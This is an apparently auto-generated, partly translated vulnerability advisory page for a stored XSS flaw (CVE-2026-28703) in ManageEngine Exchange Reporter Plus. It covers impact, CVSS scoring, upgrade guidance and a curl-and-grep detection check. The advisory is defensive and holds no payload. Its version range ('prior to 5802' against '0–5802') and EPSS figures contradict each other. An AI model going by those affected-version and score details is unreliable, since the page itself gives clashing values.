無料スキャン
HIGHCVE-2026-28703CVSS 7.3

保存済み XSS 脆弱性

プラットフォーム

manageengine

コンポーネント

manageengine-exchange-reporter-plus

修正版

5802

AI Confidence: highNVDEPSS 0.0%レビュー済み: 2026年5月
NVDで見る
保存
あなたの言語に翻訳中…

CVE-2026-28703 describes a Stored Cross-Site Scripting (XSS) vulnerability affecting ManageEngine Exchange Reporter Plus. This vulnerability allows attackers to inject malicious scripts into the 'Mails Exchanged Between Users' report, which could then be executed by unsuspecting users. Versions prior to 5802 are affected, and a patch is available in version 5802.

影響と攻撃シナリオ翻訳中…

Successful exploitation of CVE-2026-28703 allows an attacker to inject arbitrary JavaScript code into the 'Mails Exchanged Between Users' report within ManageEngine Exchange Reporter Plus. When a user views this report, the injected script executes in their browser context. This can lead to various malicious outcomes, including session hijacking, credential theft (if the user is logged into other applications), and redirection to phishing sites. The attacker could potentially gain control of the user's account and access sensitive email data. The blast radius extends to all users who view the compromised report.

悪用の状況翻訳中…

CVE-2026-28703 was publicly disclosed on 2026-04-03. No public proof-of-concept (PoC) code has been released at the time of writing. The vulnerability's EPSS score is currently pending evaluation. It is not listed on the CISA KEV catalog.

リスク対象者翻訳中…

Organizations using ManageEngine Exchange Reporter Plus versions 0–5802 are at risk, particularly those with a large number of users accessing the 'Mails Exchanged Between Users' report. Shared hosting environments where multiple tenants share the same Exchange Reporter Plus instance are also at increased risk, as a compromised tenant could potentially impact other tenants.

検出手順翻訳中…

• web: Use curl or wget to check the 'Mails Exchanged Between Users' report endpoint for unusual JavaScript code. Inspect response headers for unexpected content-security-policy directives.

curl -s 'http://<exchange_reporter_plus_url>/reports/mails_exchanged_between_users.aspx' | grep -i '<script>'

• generic web: Monitor access and error logs for requests containing suspicious JavaScript payloads targeting the report endpoint. • generic web: Review response headers for signs of XSS filtering bypass attempts.

攻撃タイムライン

  1. Disclosure

    disclosure

脅威インテリジェンス

エクスプロイト状況

概念実証不明
CISA KEVNO
インターネット露出
レポート1 脅威レポート

EPSS

0.02% (5% パーセンタイル)

CISA SSVC

悪用状況none
自動化可能no
技術的影響total

CVSS ベクトル

脅威インテリジェンス· CVSS 3.1CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N7.3HIGHAttack VectorNetwork攻撃者がターゲットに到達する方法Attack ComplexityLow悪用に必要な条件Privileges RequiredLow攻撃に必要な認証レベルUser InteractionRequired被害者の操作が必要かどうかScopeUnchanged影響コンポーネント外への波及ConfidentialityHigh機密データ漏洩のリスクIntegrityHigh不正データ改ざんのリスクAvailabilityNoneサービス障害のリスクnextguardhq.com · CVSS v3.1 基本スコア
これらのメトリクスの意味は?
Attack Vector
ネットワーク — インターネット経由でリモートから悪用可能。物理・ローカルアクセス不要。
Attack Complexity
低 — 特別な条件不要。安定して悪用可能。
Privileges Required
低 — 有効なユーザーアカウントがあれば十分。
User Interaction
必要 — 被害者がファイルを開く、リンクをクリックするなどのアクションが必要。
Scope
変化なし — 影響は脆弱なコンポーネントのみ。
Confidentiality
高 — 機密性の完全喪失。全データが読み取り可能。
Integrity
高 — 任意のデータの書き込み・変更・削除が可能。
Availability
なし — 可用性への影響なし。

影響を受けるソフトウェア

コンポーネントmanageengine-exchange-reporter-plus
ベンダーZohocorp
影響範囲修正版
0 – 58025802

弱点分類 (CWE)

CWE-79

タイムライン

  1. 予約済み
  2. 公開日
  3. 更新日
  4. EPSS 更新日

緩和策と回避策翻訳中…

The primary mitigation for CVE-2026-28703 is to upgrade ManageEngine Exchange Reporter Plus to version 5802 or later, which contains the fix. If immediate upgrading is not possible, consider restricting access to the 'Mails Exchanged Between Users' report to only authorized personnel. Implement strict input validation and output encoding on all user-supplied data within the report generation process as a temporary workaround. Monitor web application firewalls (WAFs) for suspicious JavaScript injection attempts targeting the report endpoint.

修正方法翻訳中…

Actualice ManageEngine Exchange Reporter Plus a la versión 5802 o posterior. Esta actualización corrige la vulnerabilidad XSS almacenada en el informe 'Mails Exchanged Between Users'.

CVEセキュリティニュースレター

脆弱性分析と重要アラートをメールでお届けします。

よくある質問翻訳中…

What is CVE-2026-28703 — XSS in ManageEngine Exchange Reporter Plus?

CVE-2026-28703 is a Stored XSS vulnerability in ManageEngine Exchange Reporter Plus versions 0–5802, allowing attackers to inject malicious scripts into the 'Mails Exchanged Between Users' report.

Am I affected by CVE-2026-28703 in ManageEngine Exchange Reporter Plus?

If you are using ManageEngine Exchange Reporter Plus versions 0–5802, you are potentially affected by this vulnerability. Upgrade to version 5802 or later to mitigate the risk.

How do I fix CVE-2026-28703 in ManageEngine Exchange Reporter Plus?

The recommended fix is to upgrade ManageEngine Exchange Reporter Plus to version 5802 or later. As a temporary workaround, restrict access to the vulnerable report.

Is CVE-2026-28703 being actively exploited?

As of the current date, there are no confirmed reports of active exploitation of CVE-2026-28703, but it is important to apply the patch proactively.

Where can I find the official ManageEngine advisory for CVE-2026-28703?

Please refer to the official ManageEngine security advisory for detailed information and updates regarding CVE-2026-28703: [https://www.manageengine.com/products/exchange-reporter-plus/security-advisories.html]

あなたのプロジェクトは影響を受けていますか?

依存関係ファイルをアップロードすれば、このCVEや他のCVEがあなたに影響するか即座にわかります。

無料スキャンCVEを検索